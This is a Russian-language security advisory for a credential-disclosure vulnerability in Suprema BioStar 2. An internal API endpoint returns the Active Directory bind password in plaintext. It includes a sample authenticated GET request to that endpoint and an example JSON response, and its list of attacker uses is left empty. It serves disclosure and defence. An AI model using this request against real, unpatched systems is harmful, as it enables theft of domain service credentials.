
Разбор CVE уязвимости раскрытия учетных данных Active Directory в Suprema BioStar 2
| Поле | Сведения |
|---|---|
| CVE ID | CVE-2026-31278 |
| Вендор | Suprema Inc. |
| Продукт | BioStar 2 |
| Тип уязвимости | Раскрытие конфиденциальной информации / Утечка учетных данных |
| Вектор атаки | Удаленный / Аутентифицированный / Низкая сложность |
| Серьезность | Высокий |
| Исправлено в | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| Исследователь | Abdullah Alannaz |
Уязвимость раскрытия конфиденциальной информации существует в Suprema BioStar 2 из-за неправильной обработки настроек интеграции с Active Directory. Конечная точка внутреннего API /api/v2/setting/adserversetting возвращает учетные данные привязки Active Directory в открытом виде, несмотря на то, что пароль маскируется в административном интерфейсе.
Хотя поле пароля маскируется в административном интерфейсе, аутентифицированные запросы к внутреннему API раскрывают полный незашифрованный пароль вместе с параметрами конфигурации LDAP, включая отключенную SSL-связь.
Аутентифицированный злоумышленник отправляет HTTP GET-запрос к конечной точке конфигурации AD-сервера и получает пароль учетной записи службы Active Directory в открытом виде в ответе сервера.
Запрос:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
Ответ:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
Аутентифицированный злоумышленник может использовать раскрытые учетные данные для:
CVE-2026-31278 назначен MITRE | Исправление выпущено BioStar 2 v2.9.12 / BioStarX v1.0.2 |
Abdullah Alannaz Исследователь безопасности
Эта уязвимость была ответственно раскрыта компании Suprema. Вендор подтвердил проблему и скоординировался с MITRE для назначения CVE.